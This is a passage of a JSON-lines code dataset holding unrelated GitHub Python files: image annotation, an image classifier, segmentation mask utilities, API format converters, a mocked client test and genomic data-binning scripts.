csv.reader(res.text.strip().split('\\n'))\r\n    st.write(\"Fetching data...complete\")\r\n    plot_data()\r\nelse:\r\n    st.write(\"Fetching data...failed,\\n refresh page\")\r\n","repo_name":"singh-hemant/covid19-india","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"44056893624","text":"def emptydir(dirname):\r\n    if os.path.isdir(dirname):\r\n        shutil.rmtree(dirname)\r\n        sleep(2)  # a short delay is needed here, otherwise mkdir can fail\r\n    os.mkdir(dirname)\r\n\r\nfrom PIL import Image, ImageDraw\r\nimport shutil, os\r\nfrom time import sleep\r\n\r\nfp = open('Haar-Training_carPlate/training/positive/info.txt', 'r')\r\nlines = fp.readlines()  # read all lines of text\r\nemptydir('picMark')\r\nprint('Start drawing bounding boxes!')\r\nfor line in lines:\r\n    data = line.split(' ')\r\n    img = Image.open('Haar-Training_carPlate/training/positive/' + data[0])  # open the image file\r\n    draw = ImageDraw.Draw(img)  # drawing context\r\n    n = data[1]  # number of bounding boxes\r\n    # draw each bounding box\r\n    for i in range(int(n)):\r\n        x = int(data[2+i*4])\r\n        y = int(data[3+i*4])\r\n        w = int(data[4+i*4])\r\n        h = int(data[5+i*4])\r\n        draw.rectangle((x, y, x+w, y+h), outline='red')\r\n    filename = (data[0].split('/'))[-1]\r\n    img.save('picMark/' + filename)  # save the annotated image\r\n\r\nfp.close()\r\nprint('Finished drawing bounding boxes!')","repo_name":"HCHRJL/Image-Recognition","sub_path":"車牌辨識/picMark.py","file_name":"picMark.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"28484817187","text":"\"\"\"Compliance utilities.\"\"\"\n\n\ndef message2std(message):\n    \"\"\"Convert ROBOKOP message format to standard message format.\n\n    ROBOKOP: https://github.com/NCATS-Gamma/robokop-rank/blob/master/ranker/definitions.py\n    standard: https://github.com/NCATS-Tangerine/NCATS-ReasonerStdAPI/blob/master/API/TranslatorReasonersAPI.yaml\n    \"\"\"\n    message['query_graph'] = message.pop('question_graph')\n    for node in message['query_graph']['nodes']:\n        node['node_id'] = node.pop('id')\n    for edge in message['query_graph']['edges']:\n        edge['edge_id'] = edge.pop('id')\n    return message\n\n\ndef std2message(query):\n    \"\"\"Convert standard message format to ROBOKOP message format.\n\n    ROBOKOP: https://github.com/NCATS-Gamma/robokop-rank/blob/master/ranker/definitions.py\n    standard: https://github.com/NCATS-Tangerine/NCATS-ReasonerStdAPI/blob/master/API/TranslatorReasonersAPI.yaml\n    \"\"\"\n    message = query['query_message']\n    message['question_graph'] = message.pop('query_graph')\n    for node in message['question_graph']['nodes']:\n        node['id'] = node.pop('node_id')\n    for edge in message['question_graph']['edges']:\n        edge['id'] = edge.pop('edge_id')\n    return message\n","repo_name":"NCATS-Gamma/robokop-rank","sub_path":"ranker/api/compliance.py","file_name":"compliance.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"39"}
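message2std and std2message in the compliance record above are mirror-image key renames; a tiny round-trip illustration using those two functions with a hypothetical two-element message (not a real ROBOKOP payload):

msg = {"question_graph": {"nodes": [{"id": "n0"}], "edges": [{"id": "e0"}]}}
std = message2std(msg)
assert std["query_graph"]["nodes"][0]["node_id"] == "n0"
back = std2message({"query_message": std})
assert back["question_graph"]["nodes"][0]["id"] == "n0"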
+{"seq_id":"18709284557","text":"import base64\n\nimport cv2  # OpenCV Library\nfrom keras.models import load_model\nfrom PIL import Image, ImageOps\nimport numpy as np\n\nfrom check_contour import is_image_contoured\n\nprint(cv2.__version__)\n\n\ndef classify_image(im_b64):\n    contoured_image = is_image_contoured(im_b64)\n    size = (224, 224)\n    if contoured_image is not False:\n        model = load_model('./converted_keras/keras_model.h5')\n        data = np.ndarray(shape=(1, 224, 224, 3), dtype=np.float32)\n        # Replace this with the path to your image\n        image = contoured_image\n        height, width, channels = image.shape\n        scale_value = width / height\n        # resize the image to a 224x224 with the same strategy as in TM2:\n        # resizing the image to be at least 224x224 and then cropping from the center\n\n        image = cv2.resize(image, size, fx=scale_value, fy=1, interpolation=cv2.INTER_NEAREST)\n        # image = ImageOps.fit(image, size, Image.ANTIALIAS)\n        image_array = np.asarray(image)\n        # Normalize the image\n        normalized_image_array = (image_array.astype(np.float32) / 127.0) - 1\n        # Load the image into the array\n        data[0] = normalized_image_array\n\n        # run the inference\n        prediction = model.predict(data)\n        for predict in prediction[0]:\n            print(predict)\n        return {\"white\": prediction[0].tolist()[0], \"green\": prediction[0].tolist()[1]}\n    else:\n        return {\"result\": \"image does not have the expected 30 contours!\"}","repo_name":"VerioN1/ML-VarCode-Sticker","sub_path":"classify_image.py","file_name":"classify_image.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
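classify_image above receives im_b64 and passes it to is_image_contoured from check_contour, which is not included in this record. Presumably that helper decodes the base64 payload into an OpenCV image before counting contours; a hedged sketch of just that decoding step (the helper's actual logic is unknown):

import base64
import cv2
import numpy as np

def b64_to_cv2_image(im_b64):
    # decode a base64 string into a BGR OpenCV image
    buf = np.frombuffer(base64.b64decode(im_b64), dtype=np.uint8)
    return cv2.imdecode(buf, cv2.IMREAD_COLOR)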
+{"seq_id":"25036148412","text":"import os\nimport re\nimport pydoc\nimport torch\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nfrom pathlib import Path\nfrom PIL import Image\nfrom typing import Any, Dict, Optional, Union, List\nfrom skimage.util import montage\nfrom skimage.morphology import binary_opening, disk, label\n\n\ndef average(outputs: list, name: str) -> torch.Tensor:\n    \"\"\"\n    Compute the average of a specific tensor across a list of outputs.\n\n    Args:\n        outputs (list): A list of dictionaries representing the output data.\n        name (str): The key name of the tensor to compute the average for.\n\n    Returns:\n        torch.Tensor: The average value of the specified tensor across all outputs.\n\n    Raises:\n        TypeError: If the input `outputs` is not a list.\n        KeyError: If the specified `name` is not present in the output dictionaries.\n        ValueError: If the shape of the tensor specified by `name` is not supported.\n\n    \"\"\"\n    if len(outputs[0][name].shape) == 0:\n        return torch.stack([x[name] for x in outputs]).mean()\n    return torch.cat([x[name] for x in outputs]).mean()\n\ndef montage_rgb(x: np.ndarray) -> np.ndarray:\n    return np.stack([montage(x[:, :, :, i]) for i in range(x.shape[3])], -1)\n\n\ndef multi_rle_encode(img, **kwargs):\n    \"\"\"\n    Encode connected regions as separated masks.\n\n    Args:\n        img (ndarray): The input image containing connected regions.\n        **kwargs: Additional keyword arguments to be passed to the `rle_encode` function.\n\n    Returns:\n        list: A list of encoded masks, each corresponding to a connected region.\n    \"\"\"\n\n    labels = label(img)\n    if img.ndim > 2:\n        return [rle_encode(np.sum(labels == k, axis=2), **kwargs) for k in np.unique(labels[labels > 0])]\n    else:\n        return [rle_encode(labels == k, **kwargs) for k in np.unique(labels[labels > 0])]\n\n\ndef rle_encode(img, min_max_threshold=1e-3, max_mean_threshold=None):\n    \"\"\"\n    img: numpy array, 1 - mask, 0 - background\n    Returns run length as string formatted\n    \"\"\"\n    if np.max(img) < min_max_threshold:\n        return ''  # no need to encode if it's all zeros\n    if max_mean_threshold and np.mean(img) > max_mean_threshold:\n        return ''  # ignore overfilled mask\n    pixels = img.T.flatten()\n    pixels = np.concatenate([[0], pixels, [0]])\n    runs = np.where(pixels[1:] != pixels[:-1])[0] + 1\n    runs[1::2] -= runs[::2]\n    return ' '.join(str(x) for x in runs)\n\n\ndef rle_decode(mask_rle, shape=(768, 768)) -> np.ndarray:\n    \"\"\"\n    mask_rle: run-length as string formatted (start length)\n    shape: (height,width) of array to return\n    Returns numpy array, 1 - mask, 0 - background\n    \"\"\"\n    s = mask_rle.split()\n    starts, lengths = [np.asarray(x, dtype=int) for x in (s[0:][::2], s[1:][::2])]\n    starts -= 1\n    ends = starts + lengths\n    img = np.zeros(shape[0] * shape[1], dtype=np.uint8)\n    for lo, hi in zip(starts, ends):\n        img[lo:hi] = 1\n    return img.reshape(shape).T  # Needed to align to RLE direction\n\n\ndef masks_as_image(in_mask_list) -> np.ndarray:\n    \"\"\"Take the individual ship masks and create a single mask array for all ships\"\"\"\n    all_masks = np.zeros((768, 768), dtype=np.uint8)\n    for mask in in_mask_list:\n        if isinstance(mask, str):\n            all_masks |= rle_decode(mask)\n    return all_masks\n\n\ndef masks_as_color(in_mask_list) -> np.ndarray:\n    \"\"\"Take the individual ship masks and create a color mask array for each ship\"\"\"\n    # np.float was removed from NumPy; the built-in float is equivalent here\n    all_masks = np.zeros((768, 768), dtype=float)\n    scale = lambda x: (len(in_mask_list) + x + 1) / (len(in_mask_list) * 2)  # scale the heatmap image to shift\n    for i, mask in enumerate(in_mask_list):\n        if isinstance(mask, str):\n            all_masks[:, :] += scale(i) * rle_decode(mask)\n    return all_masks\n\ndef object_from_dict(d, parent=None, **default_kwargs):\n    \"\"\"\n    Create an object from a dictionary representation.\n\n    Args:\n        d (dict): A dictionary containing the object's attributes.\n        parent (object, optional): The parent object to create the object from (default: None).\n        **default_kwargs: Additional keyword arguments with default values to be used for object creation.\n\n    Returns:\n        object: The created object.\n    \"\"\"\n    kwargs = d.copy()\n    object_type = kwargs.pop(\"type\")\n    for name, value in default_kwargs.items():\n        kwargs.setdefault(name, value)\n\n    if parent is not None:\n        return getattr(parent, object_type)(**kwargs)  # skipcq PTC-W0034\n\n    return pydoc.locate(object_type)(**kwargs)\n\ndef rename_layers(\n    state_dict: Dict[str, Any], rename_in_layers: Dict[str, Any]\n) -> Dict[str, Any]:\n    \"\"\"\n    Renames specified layers in the state_dict based on the provided mapping.\n\n    Args:\n        state_dict (Dict[str, Any]): The original state dictionary containing layer names and values.\n        rename_in_layers (Dict[str, Any]): A dictionary specifying the layer names to be renamed and their corresponding new names.\n\n    Returns:\n        Dict[str, Any]: The modified state dictionary with renamed layers.\n\n    \"\"\"\n\n    result = {}\n    for key, value in 
state_dict.items():\n for key_r, value_r in rename_in_layers.items():\n key = re.sub(key_r, value_r, key)\n\n result[key] = value\n\n return result\n\n\ndef state_dict_from_disk(\n file_path: Union[Path, str], rename_in_layers: Optional[Dict[str, Any]] = None\n) -> Dict[str, Any]:\n \"\"\"Loads PyTorch checkpoint from disk, optionally renaming layer names.\n Args:\n file_path: path to the torch checkpoint.\n rename_in_layers: {from_name: to_name}\n ex: {\"model.0.\": \"\",\n \"model.\": \"\"}\n Returns:\n \"\"\"\n checkpoint = torch.load(file_path, map_location=lambda storage, loc: storage)\n\n if \"state_dict\" in checkpoint:\n state_dict = checkpoint[\"state_dict\"]\n else:\n state_dict = checkpoint\n\n if rename_in_layers is not None:\n state_dict = rename_layers(state_dict, rename_in_layers)\n\n return state_dict\n\ndef tensor_to_image(tens):\n \"\"\"\n Converts a tensor to a PIL Image.\n\n Args:\n tens (torch.Tensor): The input tensor to be converted to an image.\n\n Returns:\n PIL.Image.Image: The PIL Image converted from the input tensor.\n\n \"\"\"\n array = tens.squeeze(0).permute(1, 2, 0).numpy() * 255\n array = array.astype(np.uint8)\n pil_img = Image.fromarray(array)\n return pil_img\n\ndef mask_tensor_to_image(tens):\n \"\"\"\n Converts a tensor mask to a PIL Image.\n\n Args:\n tens (torch.Tensor): The input tensor to be converted to an image.\n\n Returns:\n PIL.Image.Image: The PIL Image converted from the input tensor.\n\n \"\"\"\n array = tens.permute(1, 2, 0).numpy() * 255\n array = np.squeeze(array.astype(np.uint8), -1)\n pil_img = Image.fromarray(array)\n return pil_img\n\ndef visualize(**images):\n \"\"\"\n Visualizes multiple images in a grid.\n\n Args:\n **images: Multiple keyword arguments where the key is the name of the image and the value is the image data.\n\n Returns:\n None\n\n \"\"\"\n n = len(images)\n plt.figure(figsize=(16, 5))\n for i, (name, image) in enumerate(images.items()):\n plt.subplot(1, n, i + 1)\n plt.xticks([])\n plt.yticks([])\n plt.title(\" \".join(name.split(\"_\")).title())\n plt.imshow(image)\n plt.show()\n\nif __name__ == \"__main__\":\n pass","repo_name":"atgorvi/AirbusShipDetectionTorch","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"71355071474","text":"import os\n\nimport responses\n\nfrom tamr_unify_client import Client\nfrom tamr_unify_client.auth import UsernamePasswordAuth\nfrom tests.mock_api.utils import mock_api\n\n\nbasedir = os.path.dirname(__file__)\nresponse_log_path = os.path.join(\n basedir, \"../response_logs/continuous_mastering.ndjson\"\n)\n\n\n@mock_api(response_log_path)\ndef test_continuous_mastering():\n auth = UsernamePasswordAuth(\"username\", \"password\")\n unify = Client(auth)\n\n project_id = \"1\"\n project = unify.projects.by_resource_id(project_id)\n project = project.as_mastering()\n\n unified_dataset = project.unified_dataset()\n op = unified_dataset.refresh(poll_interval_seconds=0)\n assert op.succeeded()\n\n op = project.pairs().refresh(poll_interval_seconds=0)\n assert op.succeeded()\n\n model = project.pair_matching_model()\n op = model.train(poll_interval_seconds=0)\n assert op.succeeded()\n\n op = model.predict(poll_interval_seconds=0)\n assert op.succeeded()\n\n op = project.record_clusters().refresh(poll_interval_seconds=0)\n assert op.succeeded()\n\n op = project.published_clusters().refresh(poll_interval_seconds=0)\n assert op.succeeded()\n\n 
estimate_url = (\n \"http://localhost:9100/api/versioned/v1/projects/1/estimatedPairCounts\"\n )\n estimate_json = {\n \"isUpToDate\": \"true\",\n \"totalEstimate\": {\"candidatePairCount\": \"200\", \"generatedPairCount\": \"100\"},\n \"clauseEstimates\": {\n \"clause1\": {\"candidatePairCount\": \"50\", \"generatedPairCount\": \"25\"},\n \"clause2\": {\"candidatePairCount\": \"50\", \"generatedPairCount\": \"25\"},\n \"clause3\": {\"candidatePairCount\": \"100\", \"generatedPairCount\": \"50\"},\n },\n }\n responses.add(responses.GET, estimate_url, json=estimate_json)\n\n status = project.estimate_pairs().is_up_to_date\n assert status\n\n candidate = project.estimate_pairs().total_estimate[\"candidatePairCount\"]\n assert candidate == \"200\"\n\n clause1 = project.estimate_pairs().clause_estimates[\"clause1\"]\n assert clause1[\"generatedPairCount\"] == \"25\"\n","repo_name":"Datatamer/tamr-client","sub_path":"tests/mock_api/test_continuous_mastering.py","file_name":"test_continuous_mastering.py","file_ext":"py","file_size_in_byte":2058,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"39"} +{"seq_id":"1511439277","text":"#!/usr/bin/env python3\n\n\n\nimport sys\nfrom collections import OrderedDict\nimport argparse\n\nfrom BasicTools import invertDict\nfrom FileTools import getHeadExt\n\nlbls = {}\n\nlbls.update({\"chr\" : 0 }) # chromosome index 1 2 3, X\nlbls.update({\"begin\" : 1 }) # beginning of the measured segment \nlbls.update({\"end\" : 2 }) #\"ending of the measured segment \nlbls.update({\"ctcf1\" : 3 }) # direction of the first CTCF (L/R) \nlbls.update({\"ctcf2\" : 4 }) # direction of the second CTCF (L/R) \nlbls.update({\"nPET\" : 5 }) # number of PET counts \nlbls.update({\"cmplx1\" : 6 }) # complexity (general) \nlbls.update({\"cmplx2\" : 7 }) # complexity (definition A) \nlbls.update({\"cmplx3\" : 8 }) # complexity (definition B) \nlbls.update({\"len\" : 9 }) # genomic distance\nlbls.update({\"dG_0\" : 10 }) # free energy of first structure\nlbls.update({\"TdS_0\" : 11 }) # entropy of first structure\nlbls.update({\"dGbar\" : 12 }) # average FE per segment dG_0/len\nlbls.update({\"TdSbar\" : 13 }) # average S per sgement TdS_0/len\nlbls.update({\"p_max\" : 14 }) # prob of the min FE structure\n# similarity and hamming: see Functions\n# p_sim sim cmplx -> scmplx\n# p_ham ham cmplx -> hcmplx\n# p_dTdS dTdS cmplx -> ecmplx\n# p_ddG ddG cmplx -> gcmplx\nlbls.update({\"p_sim\" : 15 }) # similarity index\nlbls.update({\"scmplx\" : 16 }) # numb iterations\nlbls.update({\"p_ham\" : 17 }) # hamming distance\nlbls.update({\"hcmplx\" : 18 }) # numb iterations\nlbls.update({\"p_dTdS\" : 19 }) # calculate from d(TdS) prob\nlbls.update({\"ecmplx\" : 20 }) # numb iterations\nlbls.update({\"p_ddG\" : 21 }) # calculate from d(dG) prob\nlbls.update({\"gcmplx\" : 22 }) # numb iterations\nlbls.update({\"open\" : 23 }) # from ATAC-seq\nlbls.update({\"active\" : 24 }) # from chromHMM and/or segway\nlbls.update({\"A\" : 25 }) # region A\nlbls.update({\"B\" : 26 }) # region B\n\n\nrlbls = invertDict(lbls) # reverse to { 0 : \"chr\" }\n\n\nfldInfo = {\n \"chr\" : \"chromosome index 1 2 3, X\",\n \"begin\" : \"beginning of the measured segment\",\n \"end\" : \"ending of the measured segment\",\n \"ctcf1\" : \"direction of the first CTCF (L/R)\",\n \"ctcf2\" : \"direction of the second CTCF (L/R)\",\n \"nPET\" : \"number of PET counts \",\n \"cmplx1\" : \"complexity (general) \",\n \"cmplx2\" : \"complexity (definition A) \",\n \"cmplx3\" : \"complexity 
(definition B) \",\n \"len\" : \"genomic distance\",\n \"dG_0\" : \"free energy of first structure\",\n \"TdS_0\" : \"entropy of first structure\",\n \"dGbar\" : \"average FE per segment dG_0/len\",\n \"TdSbar\" : \"average S per sgement TdS_0/len\",\n \"p_max\" : \"prob of the min FE structure\",\n \"p_sim\" : \"similarity index\",\n \"scmplx\" : \"numb iterations of similarity\",\n \"p_ham\" : \"hamming distance\",\n \"hcmplx\" : \"numb iterations of hamming\",\n \"p_dTdS\" : \"calculate from d(TdS) prob\",\n \"ecmplx\" : \"numb iterations of d(TdS)\",\n \"p_ddG\" : \"calculate from d(dG) prob\",\n \"gcmplx\" : \"numb iterations of d(dG)\",\n \"active\" : \"from chromHMM and/or segway\",\n \"open\" : \"from ATAC-seq\",\n \"A\" : \"region A\",\n \"B\" : \"region B\"\n}\n\n\nfldUnits = {\n \"chr\" : \"none\",\n \"begin\" : \"bp\",\n \"end\" : \"bp\",\n \"ctcf1\" : \"none\",\n \"ctcf2\" : \"none\",\n \"nPET\" : \"counts\",\n \"cmplx1\" : \"order\",\n \"cmplx2\" : \"order\",\n \"cmplx3\" : \"order\",\n \"len\" : \"[/5 kbp]\",\n \"dG_0\" : \"[kcal/mol]\",\n \"TdS_0\" : \"[kcal/mol]\",\n \"dGbar\" : \"[kcal/mol/5kbp]\",\n \"TdSbar\" : \"[kcal/mol/5kbp]\",\n \"p_max\" : \"[units]\",\n \"p_sim\" : \"[units]\",\n \"scmplx\" : \"[n/a]\",\n \"p_ham\" : \"[units]\",\n \"hcmplx\" : \"[n/a]\",\n \"p_dTdS\" : \"[units]\",\n \"ecmplx\" : \"[n/a]\",\n \"p_ddG\" : \"[units]\",\n \"gcmplx\" : \"[n/a]\",\n \"active\" : \"[units]\",\n \"open\" : \"[units]\",\n \"A\" : \"[units]\",\n \"B\" : \"[units]\"\n}\n\nallowed = {\"begin\" : 1, \n \"end\" : 2, \n \"nPET\" : 5, \n \"cmplx1\" : 6, \n \"cmplx2\" : 7, \n \"cmplx3\" : 8, \n \"len\" : 9, \n \"dG_0\" : 10, \n \"TdS_0\" : 11, \n \"dGbar\" : 12, \n \"TdSbar\" : 13, \n \"p_max\" : 14, \n \"p_sim\" : 15, \n \"scmplx\" : 16, \n \"p_ham\" : 17, \n \"hcmplx\" : 18, \n \"p_dTdS\" : 19, \n \"ecmplx\" : 20, \n \"p_ddG\" : 21, \n \"gcmplx\" : 22 \n}\n\nrallowed = invertDict(allowed)\n\ndef showOptions():\n vv = list(rallowed)\n for vvk in vv:\n print (\"%-8s %-50s\" % (rallowed[vvk], fldInfo[rallowed[vvk]]))\n #\n#\n\n# sort the results from HotSpots\ndef insSortListByIndex(alist, ndx = 0):\n for i in range(1,len(alist)): \n j = i\n \"\"\"@\n \n sort according to the component ndx in \"alist\". 
For example,\n suppose alist is of the following arrangement:\n \n > alist += [(i, j, mbl, V)] # (i, j, class MBL, dG)\n \n if we want to sort the free energy -- the third component in\n the list (starting from 0 to 3) -- then we call\n \n > alist = insSortListByIndex(alist, 3) \n \n and the third component will be sorted\n \n \"\"\"\n \n while j > 0 and alist[j][ndx] < alist[j-1][ndx]: \n alist[j], alist[j-1] = alist[j-1], alist[j] # syntactic sugar: swap the items\n j=j-1 \n #|endwhile\n \n #|endfor\n \n return alist\n#\n\n\n \nclass GenomicOrderParams(object):\n def __init__(self):\n self.flhd = ''\n self.ext = ''\n self.adata = OrderedDict()\n self.lenbar = 0.0\n self.lenmx = 0\n self.lenmn = 1e9\n self.total = 0\n self.binlist = {}\n self.binavgL = []\n self.bins = {}\n self.binsize = 0\n \n #\n \n def showStats(self):\n s = (\"overall length [/5 kbp]:\\n\")\n s += (\"min len: %4d\\n\" % self.lenmn)\n s += (\"max len: %4d\\n\" % self.lenmx)\n s += (\"avg len: %8.2f\" % self.lenbar)\n return s\n #\n \n def showGDrange(self, ndx):\n v = self.binlist[ndx]\n s = (\"genomic distance from: %d to %d /5kbp\" % (v[0], v[1]))\n return s\n #\n \n \n def readAnalLoopData(self, flnm):\n try:\n fp = open(flnm, 'r')\n except IOError:\n print (\"Cannot open %s\" % flnm)\n sys.exit(1)\n #\n \n lfp = fp.readlines()\n fp.close()\n\n self.flhd, self.ext = getHeadExt(flnm)\n \n kdt = 0\n for k in range(0, len(lfp)):\n slfp = lfp[k].strip()\n if slfp[0] == '#':\n continue\n #\n \n sl = slfp.split()\n vv = sl[0][:3]\n ndx = sl[0][3:]\n if len(ndx) == 1:\n ndx = '_' + ndx\n # print (vv, sl[0][3:])\n tag = vv + ndx + '_' + sl[1].zfill(9) + '_' + sl[2].zfill(9)\n sl[1] = int(sl[1])\n sl[2] = int(sl[2])\n sl[lbls[\"nPET\"]] = int(sl[lbls[\"nPET\"]][2:])\n # cmplx1 cmplx2 cmplx3\n sl[lbls[\"cmplx1\"]] = int(sl[lbls[\"cmplx1\"]][3:])\n sl[lbls[\"cmplx2\"]] = int(sl[lbls[\"cmplx2\"]][3:])\n sl[lbls[\"cmplx3\"]] = int(sl[lbls[\"cmplx3\"]][3:])\n \n #print (tag, sl[lbls[\"nPET\"]], sl[lbls[\"cmplx1\"]], sl[lbls[\"cmplx2\"]], sl[lbls[\"cmplx3\"]])\n \n # len \n sl[lbls[\"len\"]] = int(sl[lbls[\"len\"]])\n self.lenbar += sl[lbls[\"len\"]]\n if sl[lbls[\"len\"]] > self.lenmx:\n self.lenmx = sl[lbls[\"len\"]]\n #\n \n if sl[lbls[\"len\"]] < self.lenmn:\n self.lenmn = sl[lbls[\"len\"]]\n #\n \n # dG_0 TdS_0 dGbar TdSbar p_max \n sl[lbls[\"dG_0\"]] = float(sl[lbls[\"dG_0\"]])\n sl[lbls[\"TdS_0\"]] = float(sl[lbls[\"TdS_0\"]])\n sl[lbls[\"dGbar\"]] = float(sl[lbls[\"dGbar\"]])\n sl[lbls[\"TdSbar\"]] = float(sl[lbls[\"TdSbar\"]])\n sl[lbls[\"p_max\"]] = float(sl[lbls[\"p_max\"]])\n \n \n # p_sim scmplx\n # p_ham hcmplx\n # p_dTdS ecmplx\n # p_ddG gcmplx\n \n sl[lbls[\"p_sim\"]] = float(sl[lbls[\"p_sim\"]]); sl[lbls[\"scmplx\"]] = float(sl[lbls[\"scmplx\"]])\n sl[lbls[\"p_ham\"]] = float(sl[lbls[\"p_ham\"]]); sl[lbls[\"hcmplx\"]] = float(sl[lbls[\"hcmplx\"]])\n sl[lbls[\"p_dTdS\"]] = float(sl[lbls[\"p_dTdS\"]]); sl[lbls[\"ecmplx\"]] = float(sl[lbls[\"ecmplx\"]])\n sl[lbls[\"p_ddG\"]] = float(sl[lbls[\"p_ddG\"]]); sl[lbls[\"gcmplx\"]] = float(sl[lbls[\"gcmplx\"]])\n \n # active open A B\n sl[lbls[\"active\"]] = float(sl[lbls[\"active\"]])\n sl[lbls[\"open\"]] = float(sl[lbls[\"open\"]])\n #print (len(sl))\n if len(sl) > 25:\n sl[lbls[\"A\"]] = float(sl[lbls[\"A\"]])\n sl[lbls[\"B\"]] = float(sl[lbls[\"B\"]])\n #\n \n self.adata.update({tag : sl})\n kdt += 1\n \"\"\"\n if kdt == 10:\n sys.exit(0)\n #\n \"\"\"\n #|endfor\n self.total = kdt\n self.lenbar = float(self.lenbar)/float(kdt)\n print (self.showStats())\n \n #\n\n def 
binnedData(self, binsize):\n if self.lenmx == 0:\n print (\"ERROR: data not set\")\n sys.exit(1)\n #\n \n self.binsize = binsize\n # reset all the binning \n self.binlist = {}\n self.bins = {}\n self.binavgL = []\n \n span = self.lenmx + 20\n dspan = span // binsize\n \n bgn = 0; end = dspan\n for k in range(0, binsize):\n self.binlist.update({k : (bgn, end)})\n self.bins.update({k : [] })\n lavg = 0\n n = 0\n for vv in self.adata.keys():\n #print (self.adata[vv])\n length = self.adata[vv][lbls[\"len\"]]\n if bgn <= length and length < end:\n lavg += length\n n += 1\n self.bins[k] += [self.adata[vv]]\n #\n \n #|endfor\n \n if n > 0:\n lavg = float(lavg)/float(n)\n else:\n lavg = 0\n #\n \n self.binavgL += [lavg]\n bgn += dspan; end += dspan\n #|endfor\n #\n \n \n \n def showBinSliceOpen(self, kslice, option):\n \n if kslice >= len(self.binlist):\n print (\"ERROR: bins are between 0 and %d\" % len(self.binlist))\n sys.exit(1)\n #\n \n dataset = self.bins[kslice]\n dataset = insSortListByIndex(dataset, lbls[\"open\"])\n \n index = str(kslice).zfill(2)\n oflnm = (self.flhd + \"_open_\" + option + \"_\" + index + \".dat\")\n print (\"making \", oflnm)\n fp = open(oflnm, 'w')\n s = (\"# open %s\\n\" % option)\n s += (\"# \" + self.showGDrange(kslice) + '\\n')\n s += (\"# \" + self.showStats() + '\\n')\n s += (\"# open %s\\n\" % fldInfo[\"open\"])\n s += (\"# %-10s %s\\n\" % (option, fldInfo[option]))\n \n s += (\"\\n#open %-15s span \\n\" % option)\n s += (\"# %-15s [/5kbp]\\n\" % fldUnits[option])\n \n fp.write(s)\n for k in range(0, len(dataset)):\n dt = dataset[k]\n s = (\"%8.4f %8.2f %4d\" % (dt[lbls[\"open\"]], dt[lbls[option]], dt[lbls[\"len\"]]))\n fp.write(s + '\\n')\n #print (s)\n #|endfor\n \n fp.close()\n \n #\n \n \n def showBinSliceActive(self, kslice, option):\n if kslice >= self.binsize:\n print (\"ERROR: bins are between 0 and %d\" % len(self.binlist))\n sys.exit(1)\n #\n \n dataset = self.bins[kslice]\n dataset = insSortListByIndex(dataset, lbls[\"active\"])\n \n index = str(kslice).zfill(2)\n oflnm = (self.flhd + \"_active_\" + option + \"_\" + index + \".dat\")\n print (\"making \", oflnm)\n fp = open(oflnm, 'w')\n s = (\"# active %s\\n\" % option)\n s += (\"# \" + self.showGDrange(kslice) + '\\n')\n s += (\"# \" + self.showStats() + '\\n')\n s += (\"# active %s\\n\" % fldInfo[\"active\"])\n s += (\"# %-10s %s\\n\" % (option, fldInfo[option]))\n \n s += (\"\\n#active %-15s span \\n\" % option)\n s += (\"# %-15s [/5kbp]\\n\" % fldUnits[option])\n #print (s)\n fp.write(s)\n \n for k in range(0, len(dataset)):\n dt = dataset[k]\n s = (\"%8.4f %8.2f %4d\" % (dt[lbls[\"active\"]], dt[lbls[option]], dt[lbls[\"len\"]]))\n fp.write(s + '\\n')\n #print (s)\n \n #|endfor\n \n fp.close()\n\n #\n\n#\n\ndef main(cl):\n print (cl)\n \n parser = argparse.ArgumentParser()\n \n \n parser.add_argument('-numbins', action='store', default=20,\n dest='nbins', type=int,\n help='how many bins to divide the data.')\n \n parser.add_argument('-bins', nargs=\"+\", default=[10],\n dest='kslices',\n help='which bins to read and display.')\n \n parser.add_argument('-f', action='store', default=\"test_loops_results_all_190528.dat\",\n dest='inflnm', type=str,\n help='which data file to read')\n \n parser.add_argument('-options', nargs=\"+\", default=[\"dGbar\"],\n dest='options',\n help='which fields to show.')\n \n parser.add_argument('-showOpts', action='store_true',\n default=False,\n dest='showOpts', \n help='provides a list of options')\n \n args = parser.parse_args()\n \n flnm = args.inflnm\n bins = 
[]\n for k in args.kslices:\n bins += [int(k)]\n #\n \n nbins = int(args.nbins)\n opts = args.options\n sOpts = args.showOpts\n if sOpts:\n showOptions()\n sys.exit(0)\n #\n \n \"\"\"\n print (flnm)\n print (bins)\n print (nbins)\n print (opts)\n print (args.showOpts)\n showOptions()\n sys.exit(0)\n \"\"\"\n \n gop = GenomicOrderParams()\n gop.readAnalLoopData(flnm)\n \n gop.binnedData(nbins)\n for k in bins:\n for opt_l in opts:\n print (\"Active\")\n gop.showBinSliceActive(k, opt_l)\n print (\"Open\")\n gop.showBinSliceOpen(k, opt_l)\n #|endfor\n\n #|endfor\n \n \n#\n\n\n\nif __name__ == '__main__':\n # running the program\n main(sys.argv)\n#\n\n","repo_name":"plewczynski/looper","sub_path":"chreval/bin_data_by_genomic_distance.py","file_name":"bin_data_by_genomic_distance.py","file_ext":"py","file_size_in_byte":14807,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"32119566550","text":"#!/usr/bin/env python3\n\n\"\"\"\nQTLEnrichV2 was written under the direction and supervision of Ayellet Segre\nat Massachusetts Eye and Ear, Department of Ophthalmology and Ocular Genomics Institute\n\nAuthor: Andrew Hamel\n\nCode written in Python version 3.6\n\nQTLEnrichV2 assesses enrichment of gwas variant associations amongst qtls in\na given tissue correcting for potential confounding factors \n(MAF, distance to TSS, local LD).\n\"\"\"\n\nimport sys\nimport os\nimport os.path\nimport re\nimport argparse\nimport logging\nimport datetime\nimport pandas as pd \nimport numpy as np\nimport os_sys_qtlenrich\nimport 